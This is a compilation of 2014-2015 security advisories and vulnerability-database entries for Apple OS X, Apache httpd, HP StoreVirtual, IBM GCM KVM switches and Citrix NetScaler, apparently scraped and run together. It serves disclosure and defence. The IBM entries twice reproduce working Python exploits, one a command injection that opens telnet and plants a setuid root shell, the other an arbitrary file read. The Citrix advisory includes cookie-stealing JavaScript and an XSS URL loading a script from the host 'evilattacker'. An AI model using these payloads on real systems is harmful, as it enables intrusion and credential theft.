maliciously crafted iWork file may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of iWork files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1098 : Christopher Hickstein SceneKit Available for: OS X Mountain Lion v10.8.5 Impact: Viewing a maliciously crafted Collada file may lead to arbitrary code execution Description: A heap buffer overflow existed in SceneKit's handling of Collada files. 
Viewing a maliciously crafted Collada file may have led to arbitrary code execution. This issue was addressed through improved validation of accessor elements. CVE-ID CVE-2014-8830 : Jose Duart of Google Security Team Screen Sharing Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A user's password may be logged to a local file Description: In some circumstances, Screen Sharing may log a user's password that is not readable by other users on the system. This issue was addressed by removing logging of credential. CVE-ID CVE-2015-1148 : Apple Security - Code Signing Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Tampered applications may not be prevented from launching Description: Applications containing specially crafted bundles may have been able to launch without a completely valid signature. This issue was addressed by adding additional checks. CVE-ID CVE-2015-1145 CVE-2015-1146 UniformTypeIdentifiers Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow existed in the way Uniform Type Identifiers were handled. This issue was addressed with improved bounds checking. CVE-ID CVE-2015-1144 : Apple WebKit Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in WebKit. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1069 : lokihardt@ASRT working with HP's Zero Day Initiative Security Update 2015-004 (available for OS X Mountain Lion v10.8.5 and OS X Mavericks v10.9.5) also addresses an issue caused by the fix for CVE-2015-1067 in Security Update 2015-002. This issue prevented Remote Apple Events clients on any version from connecting to the Remote Apple Events server.
In default configurations, Remote Apple Events is not enabled. OS X Yosemite 10.10.3 includes the security content of Safari 8.0.5. https://support.apple.com/en-us/HT204658 OS X Yosemite 10.10.3 and Security Update 2015-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
mod_lua.c in the mod_lua module in the Apache HTTP Server through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging multiple Require directives, as demonstrated by a configuration that specifies authorization for one group to access a certain directory, and authorization for a second group to access a second directory (CVE-2014-8109). A malicious client could use Trailer headers to set additional HTTP headers after header processing was performed by other modules. This could, for example, lead to a bypass of header restrictions defined with mod_headers (CVE-2013-5704). A newly introduced configuration directive MergeTrailers can be used to re-enable the old method of processing Trailer headers, which also re-introduces the aforementioned flaw. This update also fixes the following bug: Prior to this update, the mod_proxy_wstunnel module failed to set up an SSL connection when configured to use a back end server using the wss: URL scheme, causing proxied connections to fail. In these updated packages, SSL is used when proxying to wss: back end servers (rhbz#1141950). The verification of md5 checksums and GPG signatures is performed automatically for you. 7) - noarch, x86_64 3. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: httpd security update Advisory ID: RHSA-2014:0921-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0921.html Issue date: 2014-07-23 CVE Names: CVE-2013-4352 CVE-2014-0117 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 ===================================================================== 1. 
Summary: Updated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7. The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 3. A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the "apache" user. (CVE-2014-0226) A NULL pointer dereference flaw was found in the mod_cache httpd module. (CVE-2013-4352) A denial of service flaw was found in the mod_proxy httpd module. (CVE-2014-0117) A denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the "DEFLATE" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system. (CVE-2014-0118) A denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. 
A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. (CVE-2014-0231) All httpd users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1120596 - CVE-2014-0231 httpd: mod_cgid denial of service 1120599 - CVE-2014-0117 httpd: mod_proxy denial of service 1120601 - CVE-2014-0118 httpd: mod_deflate denial of service 1120603 - CVE-2014-0226 httpd: mod_status heap-based buffer overflow 1120604 - CVE-2013-4352 httpd: mod_cache NULL pointer dereference crash 6. Package List: Red Hat Enterprise Linux Client Optional (v. 7): Source: httpd-2.4.6-18.el7_0.src.rpm noarch: httpd-manual-2.4.6-18.el7_0.noarch.rpm x86_64: httpd-2.4.6-18.el7_0.x86_64.rpm httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm httpd-devel-2.4.6-18.el7_0.x86_64.rpm httpd-tools-2.4.6-18.el7_0.x86_64.rpm mod_ldap-2.4.6-18.el7_0.x86_64.rpm mod_proxy_html-2.4.6-18.el7_0.x86_64.rpm mod_session-2.4.6-18.el7_0.x86_64.rpm mod_ssl-2.4.6-18.el7_0.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): Source: httpd-2.4.6-18.el7_0.src.rpm noarch: httpd-manual-2.4.6-18.el7_0.noarch.rpm x86_64: httpd-2.4.6-18.el7_0.x86_64.rpm httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm httpd-devel-2.4.6-18.el7_0.x86_64.rpm httpd-tools-2.4.6-18.el7_0.x86_64.rpm mod_ldap-2.4.6-18.el7_0.x86_64.rpm mod_proxy_html-2.4.6-18.el7_0.x86_64.rpm mod_session-2.4.6-18.el7_0.x86_64.rpm mod_ssl-2.4.6-18.el7_0.x86_64.rpm Red Hat Enterprise Linux Server (v. 
7): Source: httpd-2.4.6-18.el7_0.src.rpm noarch: httpd-manual-2.4.6-18.el7_0.noarch.rpm ppc64: httpd-2.4.6-18.el7_0.ppc64.rpm httpd-debuginfo-2.4.6-18.el7_0.ppc64.rpm httpd-devel-2.4.6-18.el7_0.ppc64.rpm httpd-tools-2.4.6-18.el7_0.ppc64.rpm mod_ssl-2.4.6-18.el7_0.ppc64.rpm s390x: httpd-2.4.6-18.el7_0.s390x.rpm httpd-debuginfo-2.4.6-18.el7_0.s390x.rpm httpd-devel-2.4.6-18.el7_0.s390x.rpm httpd-tools-2.4.6-18.el7_0.s390x.rpm mod_ssl-2.4.6-18.el7_0.s390x.rpm x86_64: httpd-2.4.6-18.el7_0.x86_64.rpm httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm httpd-devel-2.4.6-18.el7_0.x86_64.rpm httpd-tools-2.4.6-18.el7_0.x86_64.rpm mod_ssl-2.4.6-18.el7_0.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): ppc64: httpd-debuginfo-2.4.6-18.el7_0.ppc64.rpm mod_ldap-2.4.6-18.el7_0.ppc64.rpm mod_proxy_html-2.4.6-18.el7_0.ppc64.rpm mod_session-2.4.6-18.el7_0.ppc64.rpm s390x: httpd-debuginfo-2.4.6-18.el7_0.s390x.rpm mod_ldap-2.4.6-18.el7_0.s390x.rpm mod_proxy_html-2.4.6-18.el7_0.s390x.rpm mod_session-2.4.6-18.el7_0.s390x.rpm x86_64: httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm mod_ldap-2.4.6-18.el7_0.x86_64.rpm mod_proxy_html-2.4.6-18.el7_0.x86_64.rpm mod_session-2.4.6-18.el7_0.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: httpd-2.4.6-18.el7_0.src.rpm noarch: httpd-manual-2.4.6-18.el7_0.noarch.rpm x86_64: httpd-2.4.6-18.el7_0.x86_64.rpm httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm httpd-devel-2.4.6-18.el7_0.x86_64.rpm httpd-tools-2.4.6-18.el7_0.x86_64.rpm mod_ssl-2.4.6-18.el7_0.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm mod_ldap-2.4.6-18.el7_0.x86_64.rpm mod_proxy_html-2.4.6-18.el7_0.x86_64.rpm mod_session-2.4.6-18.el7_0.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. 
References: https://www.redhat.com/security/data/cve/CVE-2013-4352.html https://www.redhat.com/security/data/cve/CVE-2014-0117.html https://www.redhat.com/security/data/cve/CVE-2014-0118.html https://www.redhat.com/security/data/cve/CVE-2014-0226.html https://www.redhat.com/security/data/cve/CVE-2014-0231.html https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. ============================================================================ Ubuntu Security Notice USN-2299-1 July 23, 2014 apache2 vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS - Ubuntu 10.04 LTS Summary: Several security issues were fixed in Apache HTTP Server. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-0118) Marek Kroemeke and others discovered that the mod_status module incorrectly handled certain requests. (CVE-2014-0226) Rainer Jung discovered that the mod_cgid module incorrectly handled certain scripts. (CVE-2014-0231) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 14.04 LTS: apache2-bin 2.4.7-1ubuntu4.1 Ubuntu 12.04 LTS: apache2.2-bin 2.2.22-1ubuntu1.7 Ubuntu 10.04 LTS: apache2.2-bin 2.2.14-5ubuntu8.14 In general, a standard system update will make all the necessary changes
VAR-201407-0539 CVE-2014-2606 HP StoreVirtual 4000 Storage Series and StoreVirtual VSA Vulnerability gained in CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in HP StoreVirtual 4000 Storage and StoreVirtual VSA 9.5 through 11.0 allows remote authenticated users to gain privileges via unknown vectors. Both the HP StoreVirtual 4000 Storage and the StoreVirtual VSA are storage devices for virtualized environments from Hewlett Packard (HP). The StoreVirtual 4000 Storage is a scale-out storage platform based on the LeftHand operating system. The StoreVirtual VSA is a set of software-defined virtual storage devices. A security vulnerability exists in the HP StoreVirtual 4000 Storage and StoreVirtual VSA versions 9.5 through 11.0. Successful exploits may compromise affected computers. Note: Technical details are currently unavailable. We will update this BID as soon as more information becomes available. Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04281279 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04281279 Version: 1 HPSBST03039 rev.1 - HP StoreVirtual 4000 Storage and StoreVirtual VSA, Remote Disclosure of Information, Elevation of Privilege NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-07-14 Last Updated: 2014-07-14 Potential Security Impact: Remote disclosure of information, elevation of privilege Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP StoreVirtual 4000 Storage and StoreVirtual VSA. The vulnerabilities could be exploited remotely resulting in disclosure of information. References: CVE-2014-2605 - Remote Disclosure of Information CVE-2014-2606 - Elevation of Privilege SSRT101457 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
RESOLUTION HP has made the following software update and mitigation information available to resolve the vulnerabilities. HP recommends the following steps from the HP StoreVirtual 4000 Storage: Network design considerations and best practices documentation to mitigate the risk of CVE-2014-2605: the StoreVirtual iSCSI traffic and management traffic should not reside on the same network the management traffic should remain on the customers local network the management traffic should be isolated from external network traffic Reference: HP StoreVirtual 4000 Storage: Network design considerations and best practices http://h20195.www2.hp.com/v2/GetPDF.aspx/4AA2-5615ENW.pdf HISTORY Version:1 (rev.1) - 14 July 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
VAR-201407-0538 CVE-2014-2605 HP StoreVirtual 4000 Storage Series and StoreVirtual VSA Vulnerability in which important information is obtained CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Unspecified vulnerability in HP StoreVirtual 4000 Storage and StoreVirtual VSA 9.5 through 11.0 allows remote attackers to obtain sensitive information via unknown vectors. Both the HP StoreVirtual 4000 Storage and the StoreVirtual VSA are storage devices for virtualized environments from Hewlett Packard (HP). The StoreVirtual 4000 Storage is a scale-out storage platform based on the LeftHand operating system. The StoreVirtual VSA is a set of software-defined virtual storage devices. A security vulnerability exists in the HP StoreVirtual 4000 Storage and StoreVirtual VSA versions 9.5 through 11.0. Note: Technical details are currently unavailable. We will update this BID as soon as more information becomes available. Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04281279 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04281279 Version: 1 HPSBST03039 rev.1 - HP StoreVirtual 4000 Storage and StoreVirtual VSA, Remote Disclosure of Information, Elevation of Privilege NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-07-14 Last Updated: 2014-07-14 Potential Security Impact: Remote disclosure of information, elevation of privilege Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP StoreVirtual 4000 Storage and StoreVirtual VSA. References: CVE-2014-2605 - Remote Disclosure of Information CVE-2014-2606 - Elevation of Privilege SSRT101457 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. RESOLUTION HP has made the following software update and mitigation information available to resolve the vulnerabilities.
HP recommends the following steps from the HP StoreVirtual 4000 Storage: Network design considerations and best practices documentation to mitigate the risk of CVE-2014-2605: the StoreVirtual iSCSI traffic and management traffic should not reside on the same network the management traffic should remain on the customers local network the management traffic should be isolated from external network traffic Reference: HP StoreVirtual 4000 Storage: Network design considerations and best practices http://h20195.www2.hp.com/v2/GetPDF.aspx/4AA2-5615ENW.pdf HISTORY Version:1 (rev.1) - 14 July 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. 
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
VAR-201408-0279 CVE-2014-3080 IBM GCM16 and GCM32 Global Console Manager Cross-site scripting vulnerability in switch firmware CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php. IBM 1754 GCM16 and GCM32 Global Console Managers are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following versions are vulnerable: IBM 1754 GCM16 Global Console Manager running firmware 1.20.0.22575 and prior IBM 1754 GCM32 Global Console Manager running firmware 1.20.0.22575 and prior. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. The vulnerability stems from insufficient filtering of the 'query' string in the kvm.cgi file and insufficient filtering of the 'key' parameter in the avctalert.php script. *Product description* The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerable. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received. *1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability: #!/usr/bin/python""" Exploit for Avocent KVM switch v1.20.0.22575. 
Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl import os sessid = "1111111111" target = "192.168.0.10" durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;" storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: print "[*] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[*] Done" print "[*] Trying telnet..." print "[*] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target) *2. Arbitrary file read * CVEID: CVE-2014-3081 Description: This device allows any authenticated user to read arbitrary files. Files can be anywhere on the target. PoC of this vulnerability: #!/usr/bin/python """ This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to read arbitrary files on device. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. 
alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat" durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: c.perform() c.close() except: print "" content = storage.getvalue() print content.replace("<td>","").replace("</td>","") *3. Cross site scripting non-persistent* CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E *Vendor Response:* IBM release 1.20.20.23447 firmware *Timeline:* 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed *External Information:* Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983 -- -- Alejandro Alvarez Bravo alex.a.bravo@gmail.com
VAR-201408-0280 CVE-2014-3081 IBM GCM16 and GCM32 Global Console Manager Switch firmware prodtest.php Vulnerable to reading arbitrary files CVSS V2: 6.3
CVSS V3: -
Severity: MEDIUM
prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter. An attacker can exploit this issue to read arbitrary files in the context of the user running the application. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access.

*Product description*
The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerable. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received.

*1. Remote code execution*
CVEID: CVE-2014-2085
Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch.
PoC of this vulnerability:

#!/usr/bin/python
"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is necessary for this to work, so you need a valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""
from StringIO import StringIO
import pycurl
import os

sessid = "1111111111"
target = "192.168.0.10"
durl = "https://" + target + "/systest.php?lpres=;%20/usr/sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20;"

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try:
    print "[*] Sending GET to " + target + " with session id " + sessid + "..."
    c.perform()
    c.close()
except:
    print ""
finally:
    print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password \"root\""
os.system("telnet " + target)

*2. Files can be anywhere on the target. SessionId (avctSessionId) is necessary for this to work, so you need a valid user. alex.a.bravo@gmail.com """

from StringIO import StringIO
import pycurl

sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"
durl = "https://" + target + "/prodtest.php?engage=video_bits&display=results&filename=" + file

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try:
    c.perform()
    c.close()
except:
    print ""
content = storage.getvalue()
print content.replace("<td>","").replace("</td>","")

*3. Cross site scripting non-persistent*
CVEID: CVE-2014-3080
Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
Examples:
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E

*Vendor Response:*
IBM release 1.20.20.23447 firmware

*Timeline:*
2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch Disclosed
2014-07-17 - Vulnerability disclosed

*External Information:*
Info about the vulnerability (Spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html
IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983

--
Alejandro Alvarez Bravo
alex.a.bravo@gmail.com
VAR-201407-0463 CVE-2014-4346 Citrix NetScaler Application Delivery Controller and NetScaler Gateway Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in administration user interface in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway (formerly Access Gateway Enterprise Edition) 10.1 before 10.1-126.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Citrix NetScaler Application Delivery Controller 10.x prior to 10.1-126.12 and 9.x prior to 9.3-62.4 are vulnerable. Note: Citrix NetScaler Gateway is formerly known as Citrix Access Gateway Enterprise Edition. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML.

SEC Consult Vulnerability Lab Security Advisory < 20140716-2 >
=======================================================================
title: Multiple vulnerabilities
product: Citrix NetScaler Application Delivery Controller
         Citrix NetScaler Gateway
vulnerable version: <9.3-62.4
                    <10.1-126.12
fixed version: >=9.3-62.4
               >=10.1-126.12
CVE: CVE-2014-4346, CVE-2014-4347
impact: High
homepage: http://www.citrix.com
found: 2014-01-05
by: Stefan Viehböck
    SEC Consult Vulnerability Lab
    https://www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------
"Citrix NetScaler helps organizations build enterprise cloud networks that embody the characteristics and capabilities that define public cloud services, such as elasticity, expandability and simplicity. NetScaler brings to enterprise IT leaders multiple advanced technologies that were previously available only to large public cloud providers."

"As an undisputed leader of service and application delivery, Citrix NetScaler solutions are deployed in thousands of networks around the globe to optimize, secure and control the delivery of all enterprise and cloud services. They deliver 100 percent application availability, application and database server offload, acceleration and advanced attack protection. Deployed directly in front of web and database servers, NetScaler solutions combine high-speed load balancing and content switching, http compression, content caching, SSL acceleration, application flow visibility and a powerful application firewall into a single, easy-to-use platform."

URL: http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html

Business recommendation:
------------------------
Attackers can exploit XSS and other vulnerabilities that lead to cookie disclosure to execute administrative actions. Affected Systems should be updated as soon as possible.

Vulnerability overview/description:
-----------------------------------
1) Cookie disclosure
The error handler in the Apache g_soap module prints all of the request header information including the HTTP Cookie field. This vulnerability can be used in XSS attacks to gain access to the otherwise well protected (HttpOnly) "SESSID" cookie of an administrator.

2) Reflected Cross-Site Scripting (XSS)
Citrix Netscaler suffers from multiple reflected Cross-Site Scripting vulnerabilities, which allow an attacker to steal user information, impersonate users and perform administrative actions on the appliance. There are many parameters which are not properly sanitized and thus vulnerable to XSS.

Proof of concept:
-----------------
1) Cookie disclosure
A GET request to the SOAP handler returns the following information:

GET /soap HTTP/1.1
Host: <host>
*OTHER HEADER FIELDS*

Response:

HTTP/1.1 200 OK
...
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
...
<BODY>
<H1>mod_gsoap Apache SOAP Server Error</H1>
<p><strong>No body received</strong>
...
<br>Cookie: SESSID=*SESSION ID*;
...

In combination with an XSS vulnerability (see 2) an attacker can use the following code to extract cookies including the SESSID cookie of an administrator:

var request = new XMLHttpRequest();
request.open('GET', '/soap', false);
request.send();
lines=request.responseText.split('<br>')
for (var i in lines){
    if (lines[i].indexOf('Cookie')==0){
        alert(lines[i]);
        break;
    }
}

2) Reflected Cross-Site Scripting
Accessing the following URL will include the Javascript code from http://evilattacker/evil.js:
http://<host>/menu/topn?name=";<%2fscript><script+src%3d"http:%2f%2fevilattacker%2fevil.js"><%2fscript>

